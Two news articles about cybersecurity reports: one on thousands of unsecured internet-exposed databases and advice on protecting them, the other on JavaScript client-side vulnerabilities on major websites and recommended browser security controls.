How to protect your website’s database from hackers


A recent investigation by NordPass and a white hat hacker discovered more than 9,000 unsecured databases online with more than 10 billion individual entries.


Image: iStock/Vladimir_Timofeev

Website databases contain a treasure trove of confidential information, including usernames, email addresses, phone numbers, and passwords (albeit encrypted passwords…hopefully). Such databases are a tempting target for cybercriminals who can hack into them to steal such information and then easily sell it to fellow criminals on the Dark Web. That’s why website databases should be as secure and protected as possible. But that’s not necessarily the reality.

SEE: Zero trust security: A cheat sheet (free PDF) (TechRepublic) 

A report released Wednesday by password manager NordPass revealed a total of 9,517 unsecured databases with more than 10.4 billion entries for such data as emails, passwords, and phone numbers.

The research was conducted by NordPass with the aid of a white hack hacker who used certain online tools to scan for exposed and unprotected databases from June 2019 to June 2020. Once such databases were uncovered, the hacker was able to log into them to see what kind of data could be found and then shared his discoveries with NordPass.

Looking across 20 countries, China topped the list with more than 3,700 exposed databases and more than 2.6 billion entries. The US came in second with 2,703 unprotected databases and almost 2.4 billion entries made available online. And in third place was India with 520 unsecured databases and 4.8 billion individual entries.

Image: NordPass

With such unprotected databases, a cybercriminal doesn’t even need to employ full hacking skills. Virtually anyone can access these databases through publicly available websites and tools. Using search engines such as Censys or Shodan, someone can scan the web to view open databases. The hacker hired by NordPass scanned libraries from Elasticsearch and mongoDB to seek out exposed, unprotected databases. In cases where the database administrators failed to change the default logins, accessing the database would be a simple task.

“In fact, with proper equipment, you could easily scan the whole internet on your own in just 40 minutes,” Chad Hammond, security expert at NordPass, said in a press release.

Some of the accessible databases and the associated data discovered may be in place just for testing purposes, according to NordPass, in which case it would be useless to cybercriminals. But assuming at least some of the data is from actual customers or other users, exposing it would be damaging.

Citing a real-world example of a major database leak, NordPass pointed to the instance from early 2019 in which millions of Facebook records were exposed on a public Amazon cloud server.

In another case from 2019, an unprotected database stored on a Microsoft cloud server exposed the personal information of 80 million US households. The leaked data included addresses, income, and marital status.

And in a third incident, a US rehabilitation clinic suffered a data leak that exposed the personal data of almost 150,000 patients. In this breach, the data wasn’t obtained by any sophisticated hacking method; rather, it was just there in a public database waiting to be leaked.

Just this month, unsecured databases were hit by a “Meow” attack, already wiping out data from thousands of them. In these types of incidents, the attacker typically requests a ransom, but not with Meow.  

“These kinds of attacks are very frequent,” Hammond said. “Usually, the attacker asks for ransom. This attack seems to be different only because the hackers deleted the data instead of asking for ransom. And while some of the affected databases only contained testing data, the Meow attack targeted some high-level victims, among which was one of the biggest payment platforms in Africa.”

To help organizations better protect and secure their website databases, Hammond offers several thoughts.

First, data security and protection should be a top priority. “Every company, entity, or developer should make sure they never leave any database exposed, as this is obviously a huge threat to user data,” Hammond said.

Data can be exposed to risks both in transit and at rest and so needs protection in both states. Though different security approaches are available, encryption is a sound method and a popular way to secure data in transit and at rest. All data should be encrypted using trusted and robust algorithms instead of custom or random methods, Hammond stressed. Administrators should also select appropriate security key lengths to protect their systems from cyberattack.

Identity management is another important factor as it ensures that only the right people in an enterprise have access to certain resources such as a database. Further, businesses should have a security team on hand to take responsibility for vulnerability detection and management, Hammond said.

“Proper protection should include data encryption at rest, wire (in motion) data encryption, identity management, and vulnerability management,” Hammond explained.

Cybersecurity Insider Newsletter

Strengthen your organization’s IT security defenses by keeping abreast of the latest cybersecurity news, solutions, and best practices.
Delivered Tuesdays and Thursdays

Sign up today

Also see

Major websites plagued by lack of effective security against JavaScript vulnerabilities


Code running on sites can be exploited to steal or leak data via client-side attacks enabled by the programming language, says Tala Security.


JavaScript has become a popular and pervasive programming language used by many websites to build interactive content. But like other popular tools and technologies, JavaScript is beset with vulnerabilities that hackers can exploit to steal sensitive online data. A report released Tuesday by security provider Tala Security maintains that most major websites are ill-equipped to combat the flaws in JavaScript, thus putting their customer and user data at risk.

SEE: The 10 most important cyberattacks of the decade (free PDF) (TechRepublic) 

For its “2020 Global Data at Risk State of the Web Report,” Tala analyzed the security defenses of the top 1,000 websites as ranked by Alexa. This list includes major sites such as Google, YouTube, Baidu, Facebook, Yahoo, Amazon, Zoom, Netflix, and Microsoft. Citing a “troubling lack of security controls required to prevent data theft,” the report said that these sites are vulnerable to client-side attacks that exploit JavaScript vulnerabilities, including Magecart, formjacking, cross-site scripting, and credit card skimming.

The risk from JavaScript exploitation is higher in 2020 as the average website now includes content from 22 different third-party JavaScript vendors, up slightly from the level seen in 2019. Some 58% of the content that appears in a user’s browser is delivered by these third-party JavaScript integrations.

The interactive forms found on 92% of the analyzed websites expose data to on average 17 different domains. This data includes personally identifiable information (PII), login credentials, card transactions, and medical records. Based on Tala’s analysis, this data is exposed to 10 times more domains than intended, one reason Magecart, formjacking, and card skimming attacks are able to continue.

Some 99% of websites globally include multiple client-side vulnerabilities, making them attractive targets for attackers.

Image: Tala Security

Though Magecart attacks often capture the most attention, no form of attack is more pervasive than cross-site scripting (XSS). A full 97% of the websites examined are using dangerous JavaScript functions that could open the door to a DOM XSS attack. Though standards-based security controls could prevent these attacks, such controls aren’t applied consistently or frequently enough, according to Tala.

“JavaScript powers today’s rich, highly customized web experience and enables digital transformation across all industry sectors,” Tala Security founder and CEO Aanand Krishnan said in a press release. “The fact that it remains largely unguarded is both surprising and disappointing. Websites generate massive volumes of high-value data, making them a primary target for attackers. The fundamental issue with the way today’s websites are secured is that user data is greatly exposed to third-party applications and services and that data leakage is occurring even from trusted third-party resources.”

How can websites better guard against data theft and leakage due to JavaScript vulnerabilities? Tala recommends that site developers implement such controls as Content Security Policy (CSP), Subresource Integrity (SRI), and HTTP Strict Transport Security (HSTS), all of which can mitigate against JavaScript-based client-side attacks.

“Standards-based security controls are built-into all modern browsers and are designed specifically to address the vulnerabilities created by modern web architecture, including client-side attacks,” Tala said in its report. “Applied and managed correctly, these security standards, including Content Security Policy (CSP), Subresource Integrity (SRI), and others [such as HTTP Strict Transport Security (HSTS)] will mitigate client-side risk, including zero-day threats, offering a future-proof solution with no impact to website performance or user experience.  Leveraging tools that complement these capabilities by monitoring and preventing PII and other data leakage provides a comprehensive defense-in-depth approach.”

Cybersecurity Insider Newsletter

Strengthen your organization’s IT security defenses by keeping abreast of the latest cybersecurity news, solutions, and best practices.
Delivered Tuesdays and Thursdays

Sign up today

Also see